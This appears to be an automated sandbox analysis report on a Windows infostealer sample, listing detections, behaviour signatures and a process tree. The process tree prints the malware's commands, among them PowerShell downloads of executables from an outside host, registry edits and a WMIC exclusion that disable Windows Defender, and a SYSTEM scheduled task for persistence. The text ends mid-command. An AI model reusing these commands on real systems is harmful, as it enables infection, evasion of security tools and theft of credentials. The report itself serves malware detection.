Windows
Analysis Report
file.exe
Overview
General Information
Detection
Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Sigma detected: Set custom UserAgent and download file via Powershell
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected Mars stealer
Yara detected PureLog Stealer
Yara detected RedLine Stealer
Yara detected SectopRAT
Yara detected Stealc
Yara detected UAC Bypass using CMSTP
Yara detected Vidar stealer
Yara detected zgRAT
C2 URLs / IPs found in malware configuration
Checks if the current machine is a virtual machine (disk enumeration)
Connects to many ports of the same IP (likely port scanning)
Creates files in the recycle bin to hide itself
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking locale)
Found hidden mapped module (file has been removed from disk)
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies Group Policy settings
Modifies Windows Defender protection settings
Performs DNS queries to domains with low reputation
Powershell drops PE file
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell DownloadFile
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Very long command line found
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains capabilities to detect virtual machines
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Creates job files (autostart)
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries keyboard layouts
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Suspicious desktop.ini Action
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Uses reg.exe to modify the Windows registry
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
- file.exe (PID: 1900 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 705685A8DEACE858E7FC849471C045F3)
- cmd.exe (PID: 1048 cmdline: "cmd" /c "C:\Users\user\AppData\Local\Temp\nsvE79C.tmp\lood.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 3348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 5428 cmdline: powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/th.php?c=1000','stat')" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- powershell.exe (PID: 5268 cmdline: powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- WerFault.exe (PID: 5560 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 3808 -ip 3808 MD5: C31336C1EFC2CCB44B4326EA793040F2)
- i1.exe (PID: 3808 cmdline: i1.exe /SUB=2838 /str=one MD5: 22B610EEDBB3591F31508E1912ED5B01)
- u2xs.0.exe (PID: 5788 cmdline: "C:\Users\user\AppData\Local\Temp\u2xs.0.exe" MD5: BE531DFDB40E97826D86E1FB73FA73C8)
- run.exe (PID: 4820 cmdline: "C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe" MD5: 9FB4770CED09AAE3B437C1C6EB6D7334)
- cmd.exe (PID: 5616 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 4220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- MSBuild.exe (PID: 5860 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
- u2xs.3.exe (PID: 6972 cmdline: "C:\Users\user\AppData\Local\Temp\u2xs.3.exe" MD5: 397926927BCA55BE4A77839B1C44DE6E)
- WerFault.exe (PID: 5560 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3808 -s 1936 MD5: C31336C1EFC2CCB44B4326EA793040F2)
- powershell.exe (PID: 6980 cmdline: powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=444','i2.bat') " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- powershell.exe (PID: 6188 cmdline: powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=456','i3.exe')" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- i3.exe (PID: 4088 cmdline: i3.exe MD5: DA30CEE1E6389704275CA7868FC7AD1F)
- Install.exe (PID: 6036 cmdline: .\Install.exe /Bdidlg "385128" /S MD5: 90487EB500021DBCB9443A2CF972A204)
- cmd.exe (PID: 1888 cmdline: "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 6084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- forfiles.exe (PID: 7416 cmdline: forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" MD5: D95C443851F70F77427B3183B1619DD3)
- cmd.exe (PID: 7440 cmdline: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- reg.exe (PID: 7456 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
- forfiles.exe (PID: 7532 cmdline: forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" MD5: D95C443851F70F77427B3183B1619DD3)
- cmd.exe (PID: 7560 cmdline: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- reg.exe (PID: 7576 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6 MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
- forfiles.exe (PID: 7888 cmdline: forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" MD5: D95C443851F70F77427B3183B1619DD3)
- cmd.exe (PID: 7900 cmdline: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- reg.exe (PID: 7920 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6 MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
- forfiles.exe (PID: 8004 cmdline: forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" MD5: D95C443851F70F77427B3183B1619DD3)
- cmd.exe (PID: 8036 cmdline: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- reg.exe (PID: 8060 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6 MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
- forfiles.exe (PID: 8156 cmdline: forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force" MD5: D95C443851F70F77427B3183B1619DD3)
- cmd.exe (PID: 8184 cmdline: /C powershell start-process -WindowStyle Hidden gpupdate.exe /force MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- powershell.exe (PID: 1520 cmdline: powershell start-process -WindowStyle Hidden gpupdate.exe /force MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- gpupdate.exe (PID: 8052 cmdline: "C:\Windows\system32\gpupdate.exe" /force MD5: 6DC3720EA74B49C8ED64ACA3E0162AC8)
- conhost.exe (PID: 5744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- forfiles.exe (PID: 7948 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True" MD5: D95C443851F70F77427B3183B1619DD3)
- conhost.exe (PID: 7956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 7996 cmdline: /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- powershell.exe (PID: 8028 cmdline: powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- WMIC.exe (PID: 8148 cmdline: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True MD5: E2DE6500DE1148C7F6027AD50AC8B891)
- WmiPrvSE.exe (PID: 7564 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
- schtasks.exe (PID: 7568 cmdline: schtasks /CREATE /TN "biPxHmULFllsbMgnpt" /SC once /ST 17:12:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe\" Wt /gCsdidCeBm 385128 /S" /V1 /F MD5: 48C2FE20575769DE916F48EF0676A965)
- conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- forfiles.exe (PID: 356 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn biPxHmULFllsbMgnpt" MD5: D95C443851F70F77427B3183B1619DD3)
- conhost.exe (PID: 7536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 7920 cmdline: /C schtasks /run /I /tn biPxHmULFllsbMgnpt MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- schtasks.exe (PID: 920 cmdline: schtasks /run /I /tn biPxHmULFllsbMgnpt MD5: 48C2FE20575769DE916F48EF0676A965)
- chrome.exe (PID: 4416 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:/// MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
- chrome.exe (PID: 6252 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 --field-trial-handle=2200,i,17811840805501722127,12993279827100568495,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
- svchost.exe (PID: 5548 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- Install.exe (PID: 1504 cmdline: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe Wt /gCsdidCeBm 385128 /S MD5: 90487EB500021DBCB9443A2CF972A204)
- cmd.exe (PID: 7464 cmdline: "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 7460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- forfiles.exe (PID: 2380 cmdline: forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" MD5: D95C443851F70F77427B3183B1619DD3)
- cmd.exe (PID: 1868 cmdline: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- reg.exe (PID: 3848 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
- powershell.exe (PID: 1020 cmdline: powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Pol